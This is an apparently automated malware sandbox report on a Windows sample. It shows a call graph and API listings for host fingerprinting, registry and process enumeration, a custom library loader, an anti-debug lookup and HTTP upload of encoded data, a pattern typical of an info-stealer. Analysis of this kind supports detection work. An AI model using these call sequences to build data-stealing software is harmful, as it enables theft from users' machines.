15087->15088 15089 691ff8 15088->15089 15715 697d80 GetSystemPowerStatus 15089->15715 15092 69a9b0 4 API calls 15093 692018 15092->15093 15094 69a8a0 lstrcpy 15093->15094 15095 692021 15094->15095 15096 69a9b0 4 API calls 15095->15096 15097 692040 15096->15097 15098 69a8a0 lstrcpy 15097->15098 15099 692049 15098->15099 15100 69a9b0 4 API calls 15099->15100 15101 69206a 15100->15101 15102 69a8a0 lstrcpy 15101->15102 15103 692073 15102->15103 15104 69207e GetCurrentProcessId 15103->15104 15717 699470 OpenProcess 15104->15717 15107 69a920 3 API calls 15108 6920a4 15107->15108 15109 69a8a0 lstrcpy 15108->15109 15110 6920ad 15109->15110 15111 69a9b0 4 API calls 15110->15111 15112 6920d7 15111->15112 15113 69a8a0 lstrcpy 15112->15113 15114 6920e0 15113->15114 15115 69a9b0 4 API calls 15114->15115 15116 692100 15115->15116 15117 69a8a0 lstrcpy 15116->15117 15118 692109 15117->15118 15722 697e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15118->15722 15121 69a9b0 4 API calls 15122 692129 15121->15122 15123 69a8a0 lstrcpy 15122->15123 15124 692132 15123->15124 15125 69a9b0 4 API calls 15124->15125 15126 692151 15125->15126 15127 69a8a0 lstrcpy 15126->15127 15128 69215a 15127->15128 15129 69a9b0 4 API calls 15128->15129 15130 69217b 15129->15130 15131 69a8a0 lstrcpy 15130->15131 15132 692184 15131->15132 15726 697f60 15132->15726 15135 69a9b0 4 API calls 15136 6921a4 15135->15136 15137 69a8a0 lstrcpy 15136->15137 15138 6921ad 15137->15138 15139 69a9b0 4 API calls 15138->15139 15140 6921cc 15139->15140 15141 69a8a0 lstrcpy 15140->15141 15142 6921d5 15141->15142 15143 69a9b0 4 API calls 15142->15143 15144 6921f6 15143->15144 15145 69a8a0 lstrcpy 15144->15145 15146 6921ff 15145->15146 15739 697ed0 GetSystemInfo wsprintfA 15146->15739 15149 69a9b0 4 API calls 15150 69221f 15149->15150 15151 69a8a0 lstrcpy 15150->15151 15152 692228 15151->15152 15153 69a9b0 4 API calls 15152->15153 15154 692247 15153->15154 15155 69a8a0 lstrcpy 15154->15155 15156 692250 15155->15156 15157 69a9b0 4 API calls 15156->15157 15158 692270 15157->15158 15159 69a8a0 lstrcpy 15158->15159 15160 692279 15159->15160 15741 698100 GetProcessHeap RtlAllocateHeap 15160->15741 15163 69a9b0 4 API calls 15164 692299 15163->15164 15165 69a8a0 lstrcpy 15164->15165 15166 6922a2 15165->15166 15167 69a9b0 4 API calls 15166->15167 15168 6922c1 15167->15168 15169 69a8a0 lstrcpy 15168->15169 15170 6922ca 15169->15170 15171 69a9b0 4 API calls 15170->15171 15172 6922eb 15171->15172 15173 69a8a0 lstrcpy 15172->15173 15174 6922f4 15173->15174 15747 6987c0 15174->15747 15177 69a920 3 API calls 15178 69231e 15177->15178 15179 69a8a0 lstrcpy 15178->15179 15180 692327 15179->15180 15181 69a9b0 4 API calls 15180->15181 15182 692351 15181->15182 15183 69a8a0 lstrcpy 15182->15183 15184 69235a 15183->15184 15185 69a9b0 4 API calls 15184->15185 15186 69237a 15185->15186 15187 69a8a0 lstrcpy 15186->15187 15188 692383 15187->15188 15189 69a9b0 4 API calls 15188->15189 15190 6923a2 15189->15190 15191 69a8a0 lstrcpy 15190->15191 15192 6923ab 15191->15192 15752 6981f0 15192->15752 15194 6923c2 15195 69a920 3 API calls 15194->15195 15196 6923d5 15195->15196 15197 69a8a0 lstrcpy 15196->15197 15198 6923de 15197->15198 15199 69a9b0 4 API calls 15198->15199 15200 69240a 15199->15200 15201 69a8a0 lstrcpy 15200->15201 15202 692413 15201->15202 15203 69a9b0 4 API calls 15202->15203 15204 692432 15203->15204 15205 69a8a0 lstrcpy 15204->15205 15206 69243b 15205->15206 15207 69a9b0 4 API calls 15206->15207 15208 69245c 15207->15208 15209 69a8a0 lstrcpy 15208->15209 15210 692465 15209->15210 15211 69a9b0 4 API calls 15210->15211 15212 692484 15211->15212 15213 69a8a0 lstrcpy 15212->15213 15214 69248d 15213->15214 15215 69a9b0 4 API calls 15214->15215 15216 6924ae 15215->15216 15217 69a8a0 lstrcpy 15216->15217 15218 6924b7 15217->15218 15760 698320 15218->15760 15220 6924d3 15221 69a920 3 API calls 15220->15221 15222 6924e6 15221->15222 15223 69a8a0 lstrcpy 15222->15223 15224 6924ef 15223->15224 15225 69a9b0 4 API calls 15224->15225 15226 692519 15225->15226 15227 69a8a0 lstrcpy 15226->15227 15228 692522 15227->15228 15229 69a9b0 4 API calls 15228->15229 15230 692543 15229->15230 15231 69a8a0 lstrcpy 15230->15231 15232 69254c 15231->15232 15233 698320 17 API calls 15232->15233 15234 692568 15233->15234 15235 69a920 3 API calls 15234->15235 15236 69257b 15235->15236 15237 69a8a0 lstrcpy 15236->15237 15238 692584 15237->15238 15239 69a9b0 4 API calls 15238->15239 15240 6925ae 15239->15240 15241 69a8a0 lstrcpy 15240->15241 15242 6925b7 15241->15242 15243 69a9b0 4 API calls 15242->15243 15244 6925d6 15243->15244 15245 69a8a0 lstrcpy 15244->15245 15246 6925df 15245->15246 15247 69a9b0 4 API calls 15246->15247 15248 692600 15247->15248 15249 69a8a0 lstrcpy 15248->15249 15250 692609 15249->15250 15796 698680 15250->15796 15252 692620 15253 69a920 3 API calls 15252->15253 15254 692633 15253->15254 15255 69a8a0 lstrcpy 15254->15255 15256 69263c 15255->15256 15257 69265a lstrlen 15256->15257 15258 69266a 15257->15258 15259 69a740 lstrcpy 15258->15259 15260 69267c 15259->15260 15261 681590 lstrcpy 15260->15261 15262 69268d 15261->15262 15806 695190 15262->15806 15264 692699 15264->13696 15994 69aad0 15265->15994 15267 685009 InternetOpenUrlA 15271 685021 15267->15271 15268 68502a InternetReadFile 15268->15271 15269 6850a0 InternetCloseHandle InternetCloseHandle 15270 6850ec 15269->15270 15270->13700 15271->15268 15271->15269 15995 6898d0 15272->15995 15274 690759 15275 690a38 15274->15275 15276 69077d 15274->15276 15277 681590 lstrcpy 15275->15277 15279 690799 StrCmpCA 15276->15279 15278 690a49 15277->15278 16171 690250 15278->16171 15281 690843 15279->15281 15282 6907a8 15279->15282 15285 690865 StrCmpCA 15281->15285 15284 69a7a0 lstrcpy 15282->15284 15286 6907c3 15284->15286 15287 690874 15285->15287 15324 69096b 15285->15324 15288 681590 lstrcpy 15286->15288 15289 69a740 lstrcpy 15287->15289 15290 69080c 15288->15290 15292 690881 15289->15292 15293 69a7a0 lstrcpy 15290->15293 15291 69099c StrCmpCA 15294 6909ab 15291->15294 15313 690a2d 15291->15313 15295 69a9b0 4 API calls 15292->15295 15296 690823 15293->15296 15298 681590 lstrcpy 15294->15298 15299 6908ac 15295->15299 15297 69a7a0 lstrcpy 15296->15297 15300 69083e 15297->15300 15301 6909f4 15298->15301 15302 69a920 3 API calls 15299->15302 15998 68fb00 15300->15998 15304 69a7a0 lstrcpy 15301->15304 15305 6908b3 15302->15305 15306 690a0d 15304->15306 15307 69a9b0 4 API calls 15305->15307 15308 69a7a0 lstrcpy 15306->15308 15309 6908ba 15307->15309 15311 690a28 15308->15311 15310 69a8a0 lstrcpy 15309->15310 16114 690030 15311->16114 15313->13704 15324->15291 15646 69a7a0 lstrcpy 15645->15646 15647 681683 15646->15647 15648 69a7a0 lstrcpy 15647->15648 15649 681695 15648->15649 15650 69a7a0 lstrcpy 15649->15650 15651 6816a7 15650->15651 15652 69a7a0 lstrcpy 15651->15652 15653 6815a3 15652->15653 15653->14527 15655 6847c6 15654->15655 15656 684838 lstrlen 15655->15656 15680 69aad0 15656->15680 15658 684848 InternetCrackUrlA 15659 684867 15658->15659 15659->14604 15661 69a740 lstrcpy 15660->15661 15662 698b74 15661->15662 15663 69a740 lstrcpy 15662->15663 15664 698b82 GetSystemTime 15663->15664 15666 698b99 15664->15666 15665 69a7a0 lstrcpy 15667 698bfc 15665->15667 15666->15665 15667->14619 15669 69a931 15668->15669 15670 69a988 15669->15670 15672 69a968 lstrcpy lstrcat 15669->15672 15671 69a7a0 lstrcpy 15670->15671 15673 69a994 15671->15673 15672->15670 15673->14623 15674->14737 15676 689af9 LocalAlloc 15675->15676 15677 684eee 15675->15677 15676->15677 15678 689b14 CryptStringToBinaryA 15676->15678 15677->14625 15677->14628 15678->15677 15679 689b39 LocalFree 15678->15679 15679->15677 15680->15658 15681->14747 15682->14888 15683->14890 15684->14898 15813 6977a0 15685->15813 15688 691c1e 15688->14980 15689 6976c6 RegOpenKeyExA 15690 697704 RegCloseKey 15689->15690 15691 6976e7 RegQueryValueExA 15689->15691 15690->15688 15691->15690 15693 691c99 15692->15693 15693->14994 15695 691e09 15694->15695 15695->15036 15697 697a9a wsprintfA 15696->15697 15698 691e84 15696->15698 15697->15698 15698->15050 15700 697b4d 15699->15700 15701 691efe 15699->15701 15820 698d20 LocalAlloc CharToOemW 15700->15820 15701->15064 15704 69a740 lstrcpy 15703->15704 15705 697bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15704->15705 15713 697c25 15705->15713 15706 697d18 15708 697d28 15706->15708 15709 697d1e LocalFree 15706->15709 15707 697c46 GetLocaleInfoA 15707->15713 15710 69a7a0 lstrcpy 15708->15710 15709->15708 15714 697d37 15710->15714 15711 69a8a0 lstrcpy 15711->15713 15712 69a9b0 lstrcpy lstrlen lstrcpy lstrcat 15712->15713 15713->15706 15713->15707 15713->15711 15713->15712 15714->15077 15716 692008 15715->15716 15716->15092 15718 699493 GetModuleFileNameExA CloseHandle 15717->15718 15719 6994b5 15717->15719 15718->15719 15720 69a740 lstrcpy 15719->15720 15721 692091 15720->15721 15721->15107 15723 697e68 RegQueryValueExA 15722->15723 15724 692119 15722->15724 15725 697e8e RegCloseKey 15723->15725 15724->15121 15725->15724 15727 697fb9 GetLogicalProcessorInformationEx 15726->15727 15728 698029 15727->15728 15729 697fd8 GetLastError 15727->15729 15734 6989f0 2 API calls 15728->15734 15737 698022 15729->15737 15738 697fe3 15729->15738 15732 6989f0 2 API calls 15733 692194 15732->15733 15733->15135 15735 69807b 15734->15735 15736 698084 wsprintfA 15735->15736 15735->15737 15736->15733 15737->15732 15737->15733 15738->15727 15738->15733 15821 6989f0 15738->15821 15824 698a10 GetProcessHeap RtlAllocateHeap 15738->15824 15740 69220f 15739->15740 15740->15149 15742 6989b0 15741->15742 15743 69814d GlobalMemoryStatusEx 15742->15743 15744 698163 __aulldiv 15743->15744 15745 69819b wsprintfA 15744->15745 15746 692289 15745->15746 15746->15163 15748 6987fb GetProcessHeap RtlAllocateHeap wsprintfA 15747->15748 15750 69a740 lstrcpy 15748->15750 15751 69230b 15750->15751 15751->15177 15753 69a740 lstrcpy 15752->15753 15757 698229 15753->15757 15754 698263 15756 69a7a0 lstrcpy 15754->15756 15755 69a9b0 lstrcpy lstrlen lstrcpy lstrcat 15755->15757 15758 6982dc 15756->15758 15757->15754 15757->15755 15759 69a8a0 lstrcpy 15757->15759 15758->15194 15759->15757 15761 69a740 lstrcpy 15760->15761 15762 69835c RegOpenKeyExA 15761->15762 15763 6983ae 15762->15763 15764 6983d0 15762->15764 15765 69a7a0 lstrcpy 15763->15765 15766 6983f8 RegEnumKeyExA 15764->15766 15767 698613 RegCloseKey 15764->15767 15777 6983bd 15765->15777 15769 69843f wsprintfA RegOpenKeyExA 15766->15769 15770 69860e 15766->15770 15768 69a7a0 lstrcpy 15767->15768 15768->15777 15771 6984c1 RegQueryValueExA 15769->15771 15772 698485 RegCloseKey RegCloseKey 15769->15772 15770->15767 15773 6984fa lstrlen 15771->15773 15774 698601 RegCloseKey 15771->15774 15775 69a7a0 lstrcpy 15772->15775 15773->15774 15776 698510 15773->15776 15774->15770 15775->15777 15778 69a9b0 4 API calls 15776->15778 15777->15220 15779 698527 15778->15779 15780 69a8a0 lstrcpy 15779->15780 15781 698533 15780->15781 15782 69a9b0 4 API calls 15781->15782 15783 698557 15782->15783 15784 69a8a0 lstrcpy 15783->15784 15785 698563 15784->15785 15786 69856e RegQueryValueExA 15785->15786 15786->15774 15787 6985a3 15786->15787 15788 69a9b0 4 API calls 15787->15788 15789 6985ba 15788->15789 15790 69a8a0 lstrcpy 15789->15790 15791 6985c6 15790->15791 15792 69a9b0 4 API calls 15791->15792 15793 6985ea 15792->15793 15794 69a8a0 lstrcpy 15793->15794 15795 6985f6 15794->15795 15795->15774 15797 69a740 lstrcpy 15796->15797 15798 6986bc CreateToolhelp32Snapshot Process32First 15797->15798 15799 6986e8 Process32Next 15798->15799 15800 69875d CloseHandle 15798->15800 15799->15800 15805 6986fd 15799->15805 15801 69a7a0 lstrcpy 15800->15801 15802 698776 15801->15802 15802->15252 15803 69a9b0 lstrcpy lstrlen lstrcpy lstrcat 15803->15805 15804 69a8a0 lstrcpy 15804->15805 15805->15799 15805->15803 15805->15804 15807 69a7a0 lstrcpy 15806->15807 15808 6951b5 15807->15808 15809 681590 lstrcpy 15808->15809 15810 6951c6 15809->15810 15825 685100 15810->15825 15812 6951cf 15812->15264 15816 697720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15813->15816 15815 6976b9 15815->15688 15815->15689 15817 697780 RegCloseKey 15816->15817 15818 697765 RegQueryValueExA 15816->15818 15819 697793 15817->15819 15818->15817 15819->15815 15820->15701 15822 6989f9 GetProcessHeap HeapFree 15821->15822 15823 698a0c 15821->15823 15822->15823 15823->15738 15824->15738 15826 69a7a0 lstrcpy 15825->15826 15827 685119 15826->15827 15828 6847b0 2 API calls 15827->15828 15829 685125 15828->15829 15985 698ea0 15829->15985 15831 685184 15832 685192 lstrlen 15831->15832 15833 6851a5 15832->15833 15834 698ea0 4 API calls 15833->15834 15835 6851b6 15834->15835 15836 69a740 lstrcpy 15835->15836 15837 6851c9 15836->15837 15838 69a740 lstrcpy 15837->15838 15839 6851d6 15838->15839 15840 69a740 lstrcpy 15839->15840 15841 6851e3 15840->15841 15842 69a740 lstrcpy 15841->15842 15843 6851f0 15842->15843 15844 69a740 lstrcpy 15843->15844 15845 6851fd InternetOpenA StrCmpCA 15844->15845 15846 68522f 15845->15846 15847 6858c4 InternetCloseHandle 15846->15847 15848 698b60 3 API calls 15846->15848 15854 6858d9 ctype 15847->15854 15849 68524e 15848->15849 15850 69a920 3 API calls 15849->15850 15851 685261 15850->15851 15852 69a8a0 lstrcpy 15851->15852 15853 68526a 15852->15853 15855 69a9b0 4 API calls 15853->15855 15857 69a7a0 lstrcpy 15854->15857 15856 6852ab 15855->15856 15858 69a920 3 API calls 15856->15858 15866 685913 15857->15866 15859 6852b2 15858->15859 15860 69a9b0 4 API calls 15859->15860 15861 6852b9 15860->15861 15862 69a8a0 lstrcpy 15861->15862 15863 6852c2 15862->15863 15864 69a9b0 4 API calls 15863->15864 15865 685303 15864->15865 15867 69a920 3 API calls 15865->15867 15866->15812 15868 68530a 15867->15868 15869 69a8a0 lstrcpy 15868->15869 15870 685313 15869->15870 15871 685329 InternetConnectA 15870->15871 15871->15847 15872 685359 HttpOpenRequestA 15871->15872 15874 6858b7 InternetCloseHandle 15872->15874 15875 6853b7 15872->15875 15874->15847 15876 69a9b0 4 API calls 15875->15876 15877 6853cb 15876->15877 15878 69a8a0 lstrcpy 15877->15878 15879 6853d4 15878->15879 15880 69a920 3 API calls 15879->15880 15881 6853f2 15880->15881 15882 69a8a0 lstrcpy 15881->15882 15883 6853fb 15882->15883 15884 69a9b0 4 API calls 15883->15884 15885 68541a 15884->15885 15886 69a8a0 lstrcpy 15885->15886 15887 685423 15886->15887 15888 69a9b0 4 API calls 15887->15888 15889 685444 15888->15889 15890 69a8a0 lstrcpy 15889->15890 15891 68544d 15890->15891 15892 69a9b0 4 API calls 15891->15892 15893 68546e 15892->15893 15894 69a8a0 lstrcpy 15893->15894 15986 698ea9 15985->15986 15987 698ead CryptBinaryToStringA 15985->15987 15986->15831 15987->15986 15988 698ece GetProcessHeap RtlAllocateHeap 15987->15988 15988->15986 15989 698ef4 ctype 15988->15989 15990 698f05 CryptBinaryToStringA 15989->15990 15990->15986 15994->15267 16237 689880 15995->16237 15997 6898e1 15997->15274 15999 69a740 lstrcpy 15998->15999 16000 68fb16 15999->16000 16275 698de0 16000->16275 16172 69a740 lstrcpy 16171->16172 16173 690266 16172->16173 16174 698de0 2 API calls 16173->16174 16175 69027b 16174->16175 16176 69a920 3 API calls 16175->16176 16177 69028b 16176->16177 16178 69a8a0 lstrcpy 16177->16178 16179 690294 16178->16179 16180 69a9b0 4 API calls 16179->16180 16181 6902b8 16180->16181 16238 68988e 16237->16238 16241 686fb0 16238->16241 16240 6898ad ctype 16240->15997 16244 686d40 16241->16244 16245 686d63 16244->16245 16256 686d59 16244->16256 16245->16256 16258 686660 16245->16258 16247 686dbe 16247->16256 16264 6869b0 16247->16264 16249 686e2a 16250 686ee6 VirtualFree 16249->16250 16252 686ef7 16249->16252 16249->16256 16250->16252 16251 686f41 16253 6989f0 2 API calls 16251->16253 16251->16256 16252->16251 16254 686f38 16252->16254 16255 686f26 FreeLibrary 16252->16255 16253->16256 16257 6989f0 2 API calls 16254->16257 16255->16252 16256->16240 16257->16251 16261 68668f VirtualAlloc 16258->16261 16260 686730 16262 68673c 16260->16262 16263 686743 VirtualAlloc 16260->16263 16261->16260 16261->16262 16262->16247 16263->16262 16265 6869c9 16264->16265 16269 6869d5 16264->16269 16266 686a09 LoadLibraryA 16265->16266 16265->16269 16267 686a32 16266->16267 16266->16269 16271 686ae0 16267->16271 16274 698a10 GetProcessHeap RtlAllocateHeap 16267->16274 16269->16249 16270 686ba8 GetProcAddress 16270->16269 16270->16271 16271->16269 16271->16270 16272 6989f0 2 API calls 16272->16271 16273 686a8b 16273->16269 16273->16272 16274->16273

                              Executed Functions

                              Function 00699860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 699860-699874 call 699750 663 69987a-699a8e call 699780 GetProcAddress * 21 660->663 664 699a93-699af2 LoadLibraryA * 5 660->664 663->664 666 699b0d-699b14 664->666 667 699af4-699b08 GetProcAddress 664->667 669 699b46-699b4d 666->669 670 699b16-699b41 GetProcAddress * 2 666->670 667->666 671 699b68-699b6f 669->671 672 699b4f-699b63 GetProcAddress 669->672 670->669 673 699b89-699b90 671->673 674 699b71-699b84 GetProcAddress 671->674 672->671 675 699bc1-699bc2 673->675 676 699b92-699bbc GetProcAddress * 2 673->676 674->673 676->675
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,01482398), ref: 006998A1
                              • GetProcAddress.KERNEL32(74DD0000,01482320), ref: 006998BA
                              • GetProcAddress.KERNEL32(74DD0000,014824E8), ref: 006998D2
                              • GetProcAddress.KERNEL32(74DD0000,01482440), ref: 006998EA
                              • GetProcAddress.KERNEL32(74DD0000,01482500), ref: 00699903
                              • GetProcAddress.KERNEL32(74DD0000,014890A8), ref: 0069991B
                              • GetProcAddress.KERNEL32(74DD0000,01475B90), ref: 00699933
                              • GetProcAddress.KERNEL32(74DD0000,01475AB0), ref: 0069994C
                              • GetProcAddress.KERNEL32(74DD0000,01482350), ref: 00699964
                              • GetProcAddress.KERNEL32(74DD0000,01482470), ref: 0069997C
                              • GetProcAddress.KERNEL32(74DD0000,01482488), ref: 00699995
                              • GetProcAddress.KERNEL32(74DD0000,014822D8), ref: 006999AD
                              • GetProcAddress.KERNEL32(74DD0000,01475DD0), ref: 006999C5
                              • GetProcAddress.KERNEL32(74DD0000,01482290), ref: 006999DE
                              • GetProcAddress.KERNEL32(74DD0000,01482218), ref: 006999F6
                              • GetProcAddress.KERNEL32(74DD0000,01475C50), ref: 00699A0E
                              • GetProcAddress.KERNEL32(74DD0000,01482230), ref: 00699A27
                              • GetProcAddress.KERNEL32(74DD0000,01482260), ref: 00699A3F
                              • GetProcAddress.KERNEL32(74DD0000,01475CD0), ref: 00699A57
                              • GetProcAddress.KERNEL32(74DD0000,01482308), ref: 00699A70
                              • GetProcAddress.KERNEL32(74DD0000,01475BB0), ref: 00699A88
                              • LoadLibraryA.KERNEL32(014822A8,?,00696A00), ref: 00699A9A
                              • LoadLibraryA.KERNEL32(014823F8,?,00696A00), ref: 00699AAB
                              • LoadLibraryA.KERNEL32(014822C0,?,00696A00), ref: 00699ABD
                              • LoadLibraryA.KERNEL32(01482278,?,00696A00), ref: 00699ACF
                              • LoadLibraryA.KERNEL32(01482338,?,00696A00), ref: 00699AE0
                              • GetProcAddress.KERNEL32(75A70000,01482380), ref: 00699B02
                              • GetProcAddress.KERNEL32(75290000,014823B0), ref: 00699B23
                              • GetProcAddress.KERNEL32(75290000,014823E0), ref: 00699B3B
                              • GetProcAddress.KERNEL32(75BD0000,01482410), ref: 00699B5D
                              • GetProcAddress.KERNEL32(75450000,01475D30), ref: 00699B7E
                              • GetProcAddress.KERNEL32(76E90000,01489088), ref: 00699B9F
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00699BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00699BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: ad1bbda16a4376cdc115e08442a268f0bb3c439082a5461db7488de2ae3117ae
                              • Instruction ID: e90d11b9e75d8bcb3970622a30c118ad49fa7be448549b50bdb3eeca76e73b76
                              • Opcode Fuzzy Hash: ad1bbda16a4376cdc115e08442a268f0bb3c439082a5461db7488de2ae3117ae
                              • Instruction Fuzzy Hash: 9CA12CB550024C9FD34CEFA8FD88E663BF9F74C309B14852AA646C3264D7399852CB66
                              Function 006845C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 6845c0-684695 RtlAllocateHeap 781 6846a0-6846a6 764->781 782 6846ac-68474a 781->782 783 68474f-6847a9 VirtualProtect 781->783 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0068460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0068479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006845E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684713
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
